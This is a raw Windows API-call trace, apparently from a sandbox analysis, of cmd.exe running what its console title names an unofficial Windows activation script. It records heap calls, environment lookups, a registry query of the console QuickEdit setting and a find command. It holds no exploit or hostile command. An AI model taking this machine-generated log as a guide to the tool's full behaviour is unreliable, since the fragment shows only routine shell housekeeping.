GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0178.101] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.101] GetProcessHeap () returned 0x19a8f1e0000 [0178.101] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fa6f0 [0178.101] GetProcessHeap () returned 0x19a8f1e0000 [0178.101] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1f9f80 [0178.102] GetProcessHeap () returned 0x19a8f1e0000 [0178.102] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f9f80, Size=0xf0) returned 0x19a8f1f9f80 [0178.102] GetProcessHeap () returned 0x19a8f1e0000 [0178.102] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f9f80) returned 0xf0 [0178.102] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0178.102] GetProcessHeap () returned 0x19a8f1e0000 [0178.102] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1fa080 [0178.102] GetProcessHeap () returned 0x19a8f1e0000 [0178.102] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1fa080, Size=0x88) returned 0x19a8f1fa080 [0178.102] GetProcessHeap () returned 0x19a8f1e0000 [0178.102] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1fa080) returned 0x88 [0178.102] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.102] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.*" (normalized: "c:\\windows\\system32\\reg.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0x19a8f1f8940 [0178.102] FindClose (in: hFindFile=0x19a8f1f8940 | out: hFindFile=0x19a8f1f8940) returned 1 [0178.102] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.COM" (normalized: "c:\\windows\\system32\\reg.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0xffffffffffffffff [0178.103] GetLastError () returned 0x2 [0178.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.EXE" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0x19a8f1f8700 [0178.103] FindClose (in: hFindFile=0x19a8f1f8700 | out: hFindFile=0x19a8f1f8700) returned 1 [0178.103] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.103] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.103] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efeab0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0178.104] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe9d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe8d0 | out: lpAttributeList=0x43f9efe9d0, lpSize=0x43f9efe8d0) returned 1 [0178.104] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe9d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe8bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe9d0, lpPreviousValue=0x0) returned 1 [0178.104] GetStartupInfoW (in: lpStartupInfo=0x43f9efe960 | out: lpStartupInfo=0x43f9efe960*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0178.104] GetProcessHeap () returned 0x19a8f1e0000 [0178.104] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1eb770 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0178.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0178.105] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0178.106] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0178.106] GetProcessHeap () returned 0x19a8f1e0000 [0178.107] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0178.107] GetProcessHeap () returned 0x19a8f1e0000 [0178.107] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecd00 [0178.107] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.107] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\reg.exe", lpCommandLine="reg query HKCU\\Console /v QuickEdit ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe8f0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg query HKCU\\Console /v QuickEdit ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe8d8 | out: lpCommandLine="reg query HKCU\\Console /v QuickEdit ", lpProcessInformation=0x43f9efe8d8*(hProcess=0x84, hThread=0xac, dwProcessId=0x788, dwThreadId=0xda8)) returned 1 [0178.153] CloseHandle (hObject=0xac) returned 1 [0178.153] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.153] GetProcessHeap () returned 0x19a8f1e0000 [0178.153] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0178.153] GetEnvironmentStringsW () returned 0x19a8f20a880* [0178.153] GetProcessHeap () returned 0x19a8f1e0000 [0178.154] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f2029e0 [0178.154] memcpy (in: _Dst=0x19a8f2029e0, _Src=0x19a8f20a880, _Size=0xfbe | out: _Dst=0x19a8f2029e0) returned 0x19a8f2029e0 [0178.154] FreeEnvironmentStringsA (penv="=") returned 1 [0178.154] GetProcessHeap () returned 0x19a8f1e0000 [0178.154] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecd00) returned 1 [0178.154] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe9d0 | out: lpAttributeList=0x43f9efe9d0) [0178.154] _dup2 (_FileHandleSrc=4, _FileHandleDst=2) returned 0 [0178.154] _close (_FileHandle=4) returned 0 [0178.154] _get_osfhandle (_FileHandle=3) returned 0x90 [0178.154] DuplicateHandle (in: hSourceProcessHandle=0x84, hSourceHandle=0x90, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0178.154] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0178.154] _close (_FileHandle=5) returned 0 [0178.154] _dup (_FileHandle=0) returned 4 [0178.154] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0178.154] _close (_FileHandle=3) returned 0 [0178.154] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0178.154] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0178.154] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0178.154] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0178.155] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0178.155] _wcsicmp (_String1="find", _String2="CD") returned 3 [0178.155] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0178.155] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0178.155] _wcsicmp (_String1="find", _String2="REN") returned -12 [0178.155] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0178.155] _wcsicmp (_String1="find", _String2="SET") returned -13 [0178.155] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0178.155] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0178.155] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0178.155] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0178.155] _wcsicmp (_String1="find", _String2="MD") returned -7 [0178.155] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0178.155] _wcsicmp (_String1="find", _String2="RD") returned -12 [0178.155] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0178.155] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0178.155] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0178.155] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0178.155] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0178.155] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0178.155] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0178.155] _wcsicmp (_String1="find", _String2="VER") returned -16 [0178.155] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0178.155] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0178.155] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0178.155] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0178.155] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0178.155] _wcsicmp (_String1="find", _String2="START") returned -13 [0178.155] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0178.155] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0178.155] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0178.155] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0178.156] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0178.156] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0178.156] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0178.156] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0178.156] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0178.156] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0178.156] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0178.156] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0178.156] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0178.156] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0178.156] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0178.156] _wcsicmp (_String1="find", _String2="CD") returned 3 [0178.156] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0178.156] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0178.156] _wcsicmp (_String1="find", _String2="REN") returned -12 [0178.156] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0178.156] _wcsicmp (_String1="find", _String2="SET") returned -13 [0178.156] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0178.156] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0178.156] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0178.156] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0178.156] _wcsicmp (_String1="find", _String2="MD") returned -7 [0178.156] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0178.156] _wcsicmp (_String1="find", _String2="RD") returned -12 [0178.156] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0178.156] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0178.156] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0178.156] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0178.156] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0178.156] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0178.156] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0178.156] _wcsicmp (_String1="find", _String2="VER") returned -16 [0178.157] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0178.157] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0178.157] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0178.157] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0178.157] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0178.157] _wcsicmp (_String1="find", _String2="START") returned -13 [0178.157] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0178.157] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0178.157] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0178.157] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0178.157] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0178.157] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0178.157] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0178.157] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0178.157] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0178.157] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0178.157] _wcsicmp (_String1="find", _String2="FOR") returned -6 [0178.157] _wcsicmp (_String1="find", _String2="IF") returned -3 [0178.157] _wcsicmp (_String1="find", _String2="REM") returned -12 [0178.157] GetProcessHeap () returned 0x19a8f1e0000 [0178.157] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4010) returned 0x19a8f20d9b0 [0178.157] _wcsicmp (_String1="find", _String2="DIR") returned 2 [0178.157] _wcsicmp (_String1="find", _String2="ERASE") returned 1 [0178.157] _wcsicmp (_String1="find", _String2="DEL") returned 2 [0178.157] _wcsicmp (_String1="find", _String2="TYPE") returned -14 [0178.158] _wcsicmp (_String1="find", _String2="COPY") returned 3 [0178.158] _wcsicmp (_String1="find", _String2="CD") returned 3 [0178.158] _wcsicmp (_String1="find", _String2="CHDIR") returned 3 [0178.158] _wcsicmp (_String1="find", _String2="RENAME") returned -12 [0178.158] _wcsicmp (_String1="find", _String2="REN") returned -12 [0178.158] _wcsicmp (_String1="find", _String2="ECHO") returned 1 [0178.158] _wcsicmp (_String1="find", _String2="SET") returned -13 [0178.158] _wcsicmp (_String1="find", _String2="PAUSE") returned -10 [0178.158] _wcsicmp (_String1="find", _String2="DATE") returned 2 [0178.158] _wcsicmp (_String1="find", _String2="TIME") returned -14 [0178.158] _wcsicmp (_String1="find", _String2="PROMPT") returned -10 [0178.158] _wcsicmp (_String1="find", _String2="MD") returned -7 [0178.158] _wcsicmp (_String1="find", _String2="MKDIR") returned -7 [0178.158] _wcsicmp (_String1="find", _String2="RD") returned -12 [0178.158] _wcsicmp (_String1="find", _String2="RMDIR") returned -12 [0178.158] _wcsicmp (_String1="find", _String2="PATH") returned -10 [0178.158] _wcsicmp (_String1="find", _String2="GOTO") returned -1 [0178.158] _wcsicmp (_String1="find", _String2="SHIFT") returned -13 [0178.158] _wcsicmp (_String1="find", _String2="CLS") returned 3 [0178.158] _wcsicmp (_String1="find", _String2="CALL") returned 3 [0178.158] _wcsicmp (_String1="find", _String2="VERIFY") returned -16 [0178.158] _wcsicmp (_String1="find", _String2="VER") returned -16 [0178.158] _wcsicmp (_String1="find", _String2="VOL") returned -16 [0178.158] _wcsicmp (_String1="find", _String2="EXIT") returned 1 [0178.158] _wcsicmp (_String1="find", _String2="SETLOCAL") returned -13 [0178.158] _wcsicmp (_String1="find", _String2="ENDLOCAL") returned 1 [0178.158] _wcsicmp (_String1="find", _String2="TITLE") returned -14 [0178.158] _wcsicmp (_String1="find", _String2="START") returned -13 [0178.158] _wcsicmp (_String1="find", _String2="DPATH") returned 2 [0178.158] _wcsicmp (_String1="find", _String2="KEYS") returned -5 [0178.158] _wcsicmp (_String1="find", _String2="MOVE") returned -7 [0178.158] _wcsicmp (_String1="find", _String2="PUSHD") returned -10 [0178.159] _wcsicmp (_String1="find", _String2="POPD") returned -10 [0178.159] _wcsicmp (_String1="find", _String2="ASSOC") returned 5 [0178.159] _wcsicmp (_String1="find", _String2="FTYPE") returned -11 [0178.159] _wcsicmp (_String1="find", _String2="BREAK") returned 4 [0178.159] _wcsicmp (_String1="find", _String2="COLOR") returned 3 [0178.159] _wcsicmp (_String1="find", _String2="MKLINK") returned -7 [0178.159] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0178.159] GetProcessHeap () returned 0x19a8f1e0000 [0178.159] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200e80 [0178.159] SetErrorMode (uMode=0x0) returned 0x0 [0178.159] SetErrorMode (uMode=0x1) returned 0x0 [0178.159] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f200e90, lpFilePart=0x43f9efea40 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efea40*="System32") returned 0x13 [0178.159] SetErrorMode (uMode=0x0) returned 0x1 [0178.159] GetProcessHeap () returned 0x19a8f1e0000 [0178.159] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200e80, Size=0x42) returned 0x19a8f200e80 [0178.159] GetProcessHeap () returned 0x19a8f1e0000 [0178.159] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200e80) returned 0x42 [0178.159] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0178.159] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.159] GetProcessHeap () returned 0x19a8f1e0000 [0178.159] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1fa5f0 [0178.159] GetProcessHeap () returned 0x19a8f1e0000 [0178.159] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1e5e10 [0178.159] GetProcessHeap () returned 0x19a8f1e0000 [0178.159] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5e10, Size=0xf0) returned 0x19a8f1e5e10 [0178.160] GetProcessHeap () returned 0x19a8f1e0000 [0178.160] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5e10) returned 0xf0 [0178.160] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0178.160] GetProcessHeap () returned 0x19a8f1e0000 [0178.160] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1e5f10 [0178.160] GetProcessHeap () returned 0x19a8f1e0000 [0178.160] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1e5f10, Size=0x88) returned 0x19a8f1e5f10 [0178.160] GetProcessHeap () returned 0x19a8f1e0000 [0178.160] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1e5f10) returned 0x88 [0178.160] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.160] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7c0) returned 0x19a8f1f8d60 [0178.160] FindClose (in: hFindFile=0x19a8f1f8d60 | out: hFindFile=0x19a8f1f8d60) returned 1 [0178.160] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7c0) returned 0xffffffffffffffff [0178.160] GetLastError () returned 0x2 [0178.160] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe7c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe7c0) returned 0x19a8f1f8ca0 [0178.161] FindClose (in: hFindFile=0x19a8f1f8ca0 | out: hFindFile=0x19a8f1f8ca0) returned 1 [0178.161] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.161] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.161] GetProcessHeap () returned 0x19a8f1e0000 [0178.161] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb770 [0178.161] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.161] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.161] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.161] GetFileType (hFile=0x24) returned 0x2 [0178.161] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0178.161] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x43f9efea78 | out: lpMode=0x43f9efea78) returned 1 [0178.162] _dup (_FileHandle=1) returned 3 [0178.162] _close (_FileHandle=1) returned 0 [0178.162] _wcsicmp (_String1="nul", _String2="con") returned 11 [0178.162] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x43f9efea10, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0178.163] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0178.163] GetProcessHeap () returned 0x19a8f1e0000 [0178.163] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x218) returned 0x19a8f20d370 [0178.163] GetProcessHeap () returned 0x19a8f1e0000 [0178.163] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x32) returned 0x19a8f1e0930 [0178.163] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0178.163] GetProcessHeap () 